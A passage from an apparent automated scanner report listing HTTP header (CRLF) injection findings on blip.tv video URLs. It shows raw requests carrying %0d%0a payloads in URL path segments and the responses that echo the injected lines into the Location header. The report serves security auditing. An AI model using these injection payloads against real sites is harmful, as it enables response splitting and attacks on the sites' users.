GET /74695%0d%0aea4dd8038a4/get/CookingUpAStory-FoodSwap596.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/74695
ea4dd8038a4
/get/CookingUpAStory-FoodSwap596.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 314
Date: Thu, 20 Jan 2011 00:38:10 GMT
X-Varnish: 344224694
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/74695
ea4dd8038a4/get/Cooki
...[SNIP]...

2.121. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap596.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 42054%0d%0ab24829df45f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/42054%0d%0ab24829df45f/CookingUpAStory-FoodSwap596.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/42054
b24829df45f
/CookingUpAStory-FoodSwap596.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 315
Date: Thu, 20 Jan 2011 00:38:10 GMT
X-Varnish: 2146043279
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/42054
b24829df45f/Cook
...[SNIP]...

2.122. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap596.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 29061%0d%0a8022a006d5c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/29061%0d%0a8022a006d5c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/29061
8022a006d5c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:10 GMT
X-Varnish: 1025264548
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/29061
8022a006d5c"
...[SNIP]...

2.123. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 104a2%0d%0ad76efe8bd52 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /104a2%0d%0ad76efe8bd52/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/104a2
d76efe8bd52
/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1025264729
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/104a2
d76efe8bd52/get/Cultu
...[SNIP]...

2.124. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b6af5%0d%0a4acb56fedf4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/b6af5%0d%0a4acb56fedf4/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/b6af5
4acb56fedf4
/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 354
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1324525344
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b6af5
4acb56fedf4/Cult
...[SNIP]...

2.125. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload aeabe%0d%0a59444e21260 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/aeabe%0d%0a59444e21260 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/aeabe
59444e21260

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 344225052
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/aeabe
59444e21260"
...[SNIP]...

2.126. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fdaab%0d%0af1c4247ece4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fdaab%0d%0af1c4247ece4/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/fdaab
f1c4247ece4
/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1248903057
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fdaab
f1c4247ece4/get/Cultu
...[SNIP]...

2.127. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload db0fc%0d%0ab371a187941 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/db0fc%0d%0ab371a187941/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/db0fc
b371a187941
/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 354
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1025264774
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/db0fc
b371a187941/Cult
...[SNIP]...

2.128. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 24c8e%0d%0af60a3682fcd was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/24c8e%0d%0af60a3682fcd HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/24c8e
f60a3682fcd

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1248903142
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/24c8e
f60a3682fcd"
...[SNIP]...

2.129. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c4f43%0d%0a19dac7572a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c4f43%0d%0a19dac7572a7/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c4f43
19dac7572a7
/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 335
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 1498216432
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c4f43
19dac7572a7/get/Puddi
...[SNIP]...

2.130. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload db24f%0d%0ab3adc277396 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/db24f%0d%0ab3adc277396/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/db24f
b3adc277396
/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 1248904942
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/db24f
b3adc277396/Pudd
...[SNIP]...

2.131. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 268a9%0d%0ad1cf5597a15 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/268a9%0d%0ad1cf5597a15 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/268a9
d1cf5597a15

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 1498216515
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/268a9
d1cf5597a15"
...[SNIP]...

2.132. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e7343%0d%0a7f7c99de346 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e7343%0d%0a7f7c99de346/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e7343
7f7c99de346
/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 335
Date: Thu, 20 Jan 2011 00:38:27 GMT
X-Varnish: 2146045596
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e7343
7f7c99de346/get/Puddi
...[SNIP]...

2.133. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 15aac%0d%0aed07c2899be was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/15aac%0d%0aed07c2899be/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/15aac
ed07c2899be
/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1498216841
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/15aac
ed07c2899be/Pudd
...[SNIP]...

2.134. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ab976%0d%0a0f16fedc6ba was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/ab976%0d%0a0f16fedc6ba HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/ab976
0f16fedc6ba

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:28 GMT
X-Varnish: 1274881790
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/ab976
0f16fedc6ba"
...[SNIP]...

2.135. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5ecc3%0d%0a7f0f5967c61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5ecc3%0d%0a7f0f5967c61/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/5ecc3
7f0f5967c61
/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 335
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266593
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/5ecc3
7f0f5967c61/get/Puddi
...[SNIP]...

2.136. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5716a%0d%0ad4e7b0c5e2d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/5716a%0d%0ad4e7b0c5e2d/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/5716a
d4e7b0c5e2d
/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266634
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/5716a
d4e7b0c5e2d/Pudd
...[SNIP]...

2.137. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dca82%0d%0a1e10a54d81c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/dca82%0d%0a1e10a54d81c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/dca82
1e10a54d81c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:26 GMT
X-Varnish: 1025266669
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/dca82
1e10a54d81c"
...[SNIP]...

2.138. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 681cb%0d%0a3419a97bd3c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /681cb%0d%0a3419a97bd3c/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/681cb
3419a97bd3c
/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 344226661
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/681cb
3419a97bd3c/get/Puddi
...[SNIP]...

2.139. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload edb41%0d%0a09ccf4faebb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/edb41%0d%0a09ccf4faebb/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
